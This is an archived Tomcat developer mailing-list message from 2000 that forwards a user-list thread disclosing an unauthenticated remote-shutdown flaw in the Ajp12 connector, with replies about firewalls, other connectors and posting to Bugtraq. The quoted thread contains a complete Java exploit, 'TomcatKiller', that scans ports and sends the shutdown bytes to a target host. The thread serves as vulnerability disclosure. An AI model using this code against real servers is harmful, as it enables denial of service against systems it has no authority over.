tomcat-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Michael Percy <mpe...@portera.com>
Subject Tomcat Security Vulnerability
Date Thu, 05 Oct 2000 21:01:38 GMT
All,
Since I am uncertain how many of you check the tomcat-user list often, and I
am not personally a Java developer, I wanted to get you all in the loop on
this (and hopefully get some discussion going on a solution). What I am
talking about is the "Tomcat Killer" thread on tomcat-user over the past
hour. I have pasted in the mentioned thread below, in hopes that the people
who can do somthing about it (the developers) will have comments on it. I am
also curious as to whether or not ajpv13 is susceptible to this kind of
attack, and am not sure how to go about finding out.


Regards,

Michael Percy
QA Automation Eng.
Portera Systems


> -----Original Message-----
> From: Michael Percy [mailto:mpercy@portera.com]
> Sent: Thursday, October 05, 2000 1:36 PM
> To: 'tomcat-user@jakarta.apache.org'
> Subject: RE: Tomcat Killer
> 
> 
> I'd like to point out that many people who wish to run Tomcat 
> (at home, on a
> LAN, etc.) do not have a spare machine/router to filter 
> packets. Plus, many
> setups include multiple ports on which different connectors 
> run (to keep
> configurations separate, etc.) so one cannot just firewall 
> 8007 and proclaim
> all is well. This is very dangerous and should be 
> changed/patched/upgraded!
> If Tomcat requires a firewall to be run safely, then it is 
> NOT a secure
> product (it relies on the security of other, unrelated people and
> products!). This must be taken care of.
> 
> On a related note, does anyone know if the JNI connector is 
> susceptible to
> this? If not, then this can be a short-term workaround (does 
> it work yet?).
> 
> 
> Regards,
> 
> Michael Percy
> QA Automation Eng.
> Portera Systems
> 
> 
> > -----Original Message-----
> > From: Josh Knowles [mailto:josh.knowles@worldwidepackets.com]
> > Sent: Thursday, October 05, 2000 1:27 PM
> > To: 'tomcat-user@jakarta.apache.org'
> > Subject: RE: Tomcat Killer
> > 
> > 
> > You would think that has long as your firewall only allows 
> > access to port 80
> > and or 8080 and not 8007 then you would be fine.  Nice find though.
> > 
> > Josh
> > 
> > -----Original Message-----
> > From: Sean Schofield [mailto:sean@schof.com]
> > Sent: Thursday, October 05, 2000 1:23 PM
> > To: tomcat-user@jakarta.apache.org
> > Subject: Re: Tomcat Killer
> > 
> > 
> > Cool find!
> > 
> > Couldn't this be protected against by a firewall filtering 
> > incoming traffic 
> > so both Apache and Tomcat are behind a firewall to the 
> Intrenet and a 
> > another firewall between these servers and the LAN?  Then you 
> > would only 
> > have to worry about other servlets, etc. within the firewall 
> > messing things 
> > up.  And even then I think you need root to create sockets 
> don't you?
> > 
> > Should this be posted to Bugtraq?
> > 
> > - schof
> > 
> > At 12:51 PM 10/5/00 -0700, you wrote:
> > 
> > >Hi all, just a word of warning about Tomcat 3.1 and from what I can
> > >tell, 3.2beta4.  Looking at the source code, if you're using Ajp12 for
> > >the Apache-Tomcat comms protocol, be aware that the "Stop Tomcat"
> > >batch/shell file does its job by sending "exit please" bytes to
> > >Tomcat.  It doesn't take much to spoof this, here's my TomcatKiller
> > >class below.  Just guess a host and port which may have Tomcat
> > >running, and over it goes...
> > >
> > >I patched the sources so hopefully it won't happen to me ;)
> > >
> > >
> > >import java.net.*;
> > >import java.io.*;
> > >
> > >public class TomcatKiller {
> > >
> > >         static public void main( String[] args ) {
> > >
> > >                 final byte SIGNAL = (byte)254;
> > >                 final byte BYEBYE = (byte)15;
> > >                 byte[] msg = { SIGNAL, BYEBYE };
> > >
> > >                 int min = 8007, max = 8007;
> > >                 String host = args[0];
> > >
> > >                 try {
> > >                         if( args.length > 1 )
> > >                                 min = max = 
> > Integer.parseInt( args[1] );
> > >                         if( args.length > 2 )
> > >                                 max = Integer.parseInt( args[2] );
> > >                         if( min > max ) {
> > >                                 int tmp = min;
> > >                                 min = max;
> > >                                 max = tmp;
> > >                         }
> > >                         for( int i = min; i <= max; i++ ) {
> > >                                 try {
> > >                                         Socket s = new 
> > Socket( host, i );
> > >                                         OutputStream os = 
> > > s.getOutputStream();
> > >                                         os.write( msg );
> > >                                         os.flush();
> > >                                         break;
> > >                                 } catch( ConnectException ce ) {
> > >                                         System.err.println( 
> > "conn refused 
> > > " + i );
> > >                                 } catch( IOException ioe ) {
> > >                                         ioe.printStackTrace();
> > >                                         break;
> > >                                 }
> > >                         }
> > >                 } catch( Exception e ) {
> > >                         e.printStackTrace();
> > >                         System.exit( 1 );
> > >                 }
> > >         }
> > >}
> > >
> > >// eof
> > >
> > >
> > >stu
> > >
> > >
> > >--
> > >Stuart Maclean, Research Associate
> > >University of Washington
> > >ITS Research Program, College of Engineering
> > >Box 352500
> > >Seattle, WA 98195-2500
> > >Tel: (206) 543-0637
> > >http://www.its.washington.edu
> > 
> 

Mime
View raw message